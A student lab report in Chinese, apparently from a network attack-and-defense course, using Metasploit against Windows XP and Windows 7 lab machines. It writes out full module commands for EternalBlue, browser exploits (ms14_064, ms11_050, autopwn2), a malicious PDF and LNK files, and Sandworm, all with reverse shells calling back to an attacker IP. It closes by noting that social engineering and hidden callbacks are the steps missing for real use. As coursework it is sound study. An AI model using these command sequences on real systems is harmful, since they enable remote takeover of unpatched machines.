2018-2019-2 《网络对抗技术》Exp5 MSF基础应用 20165326

Exp5 MSF基础应用

实践内容

• 主动攻击实践
  • ms17_010_enternalblue 靶机：win7 x64成功
• 针对浏览器的攻击
  • ms14_064_ole_code_execution 靶机：winXP成功 靶机：win7失败
• 针对客户端的攻击
  • adobe_cooltype_sing 靶机：winXP成功
  • ms15_020_shortcut_icon_dllloader 靶机:winXP成功
• 成功应用任何一个辅助模块
  • gather/browser_info 靶机：winXP成功且唯一
  • server/auto_pwn2 靶机：winXP 成功

---

主动攻击

ms17_010_enternalblue

/*先search一下相关模块信息*/
use exploit/windows/smb/ms17_010_enternalblue //使用模块
set payload generic/shell_reverse_tcp //设置tcp反弹连接
set LPORT 5326 //攻击机端口
set LHOST 192.168.80.131 //攻击机ip
set RHOST 192.168.80.155 //被攻击者ip
exploit //执行
//直接进行扫描攻击，提权

针对浏览器

ms11_50

use windows/browser/ms11_050_mshtml_cobjectelement
set payload
windows/meterpreter/reverse_http //http反向回连
set LHOST 192.168.80.131 //攻击机ip
set LPORT 5326 //攻击端口
set URIPATH 5326cz //统一资源标识符路径设置
exploit
//跳转到生成的链接

失败了0.0，浏览器疯狂报错，xp这个不行，就换一个漏洞

ms14_064_ole_code_execution

use exploit/windows/browser/ms14_064_ole_code_execution //选择攻击模块
set payload windows/meterpreter/reverse_tcp //设置tcp反向连接
show targets //查看靶机
set SRVHOST 192.168.80.131 //攻IP
set AllowPowerShellPrompt true //对安装powershell的系统生效
set LHOST 192.168.80.131
set target 0 //设置靶机
exploit //攻击
//将生成的URL在靶机的ie浏览器中打开，建立session并连接，提权

针对客户端

adobe_cooltype_sing

/*生成恶意文件*/
use windows/fileformat/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp //tcp反向回连
set LHOST 192.168.80.131 //攻击机ip
set LPORT 5326 //攻击端口
set FILENAME 5326cz.pdf //设置生成pdf文件的名字
exploit
//生成文件成功后会显示该文件所存储的目录
//进入目录拖拽文件至靶机

/*进入监听模块*/
//使用back回到msf
use exploit/multi/handler //进入监听模块
set payload windows/meterpreter/reverse_tcp //tcp反向连接
set LHOST 192.168.80.131 //攻击机ip
set LPORT 5326 //攻击端口固定
exploit
//在靶机中打开文件，攻击成功

ms15_020 快捷方式图标漏洞

windows/smb/ms15_020_shortcut_icon_dllloader

use exploit/windows/smb/ms15_020_shortcut_icon_dllloader
set SRVHOST 192.168.80.131 //攻击机ip
set payload windows/meterpreter/reverse_tcp //tcp反向回连
set LHOST 192.168.80.131 //攻击机ip
exploit
//将生成的msf.lnk文件拖拽至靶机，打开，sessions连接

辅助模块auxiliary

gather/browser_info

主要用于信息收集,此处使用的gather/browser_info故名思义是收集浏览器信息

/*进入msf控制台*/
show auxiliary //查看所有辅助模块
use gather/browser_info //使用该模块
show options //查看相关配置
set SRVHOST 192.168.80.131 //攻击机ip
exploit //执行
//复制生成的URL，winXP连接，看到相关信息

sever/browser_autopwn2

这个辅助模块就很有意思，它会自己寻找合适的payload进行攻击

use auxiliary/server/browser_autopwn2
set SRVHOST 192.168.80.131
set URIPATH auto
//连接可被访问的URL，启动服务器
//浏览器跳转，回连成功，输入sessions 查看会话并连接
//提权

未成功例

sandworm

CVE-2014-4114 是OLE包管理INF 任意代码执行漏洞，该漏洞影响Win Vista，Win7等以上操作系统，攻击者使用Office PowerPoint作为攻击载体，该漏洞是在MicrosoftWindows和服务器上的OLE包管理器。在OLE打包文件（packer.dll）中能够下载并执行类似的INF外部文件，允许攻击者执行命令。

use exploit/windows/fileformat/ms14_060_sandworm
set payload windows/meterpreter/reverse_tcp
setLHOST
set LPORT
set FILENAME 5326cz.ppsx //生成文件
set UNCPATH \\\\192.168.80.131\\share //设置网络共享地址
exploit
//生成的三个文件都应该能在靶机的网络共享中通过输入攻击机的ip找到，但是我不知道为何访问不了
//使用靶机的power point 打开.ppsx文件，能够进行回连

查阅资料，这个漏洞的大致原理应该是

执行PPT –> 内置2个OLE对象–> OLE对象包含2个远程webdav地址 –>调用packager.dll的函数CPackage::OLE2MPlayerReadFromStream把远程的 .gif 和.inf 下载下来 —> 函数CPackage::DoVerb中调用SHELL32!CDefFolderMenu::InvokeCommand函数加载slides.inf,并安装这个inf文件–>inf将.gif重命名为.gif.exe。然后添加注册表启动项。

我认为的失败原因

1. 没有office2007只有wps（不知道启动程序产不产生影响）
2. 没有找到网络共享地址，直接拷贝不能到相关文件夹下进行调用
   
   

基础问题回答

• exploit
  • 执行攻击，产生攻击模块的文件
• payload
  • 载荷，传输进靶机之后为攻击者服务
• encode
  • 编码，改变shellcode，对其进行伪装
• 离实战还缺些什么技术或步骤?
  • 技术：技术欠缺很多，很多攻击不成功都找不到正确的原因，手段单一，可以变化更多
  • 社会工程学攻击:将生成好的恶意文件或代码包装一下发给受害者，找机会进行触发回连，当然回连也不能被发现

实践总结与体会

之前觉得只要掌握攻击原理，知道攻击步骤，通过show options,set [相关参数]，执行攻击就会成功，但是其中其实有很多需要自己进行修改的地方，比如我的沙虫攻击做了很久都没有弄好，在查询相关资料修改之后还是没有成功，其中涉及到的网络共享知识，.inf文件的调用配置等等。做完所有的之后感到瑟瑟发抖，msf功能也太强大了叭，说不定我现在打字就在被监视Q^Q.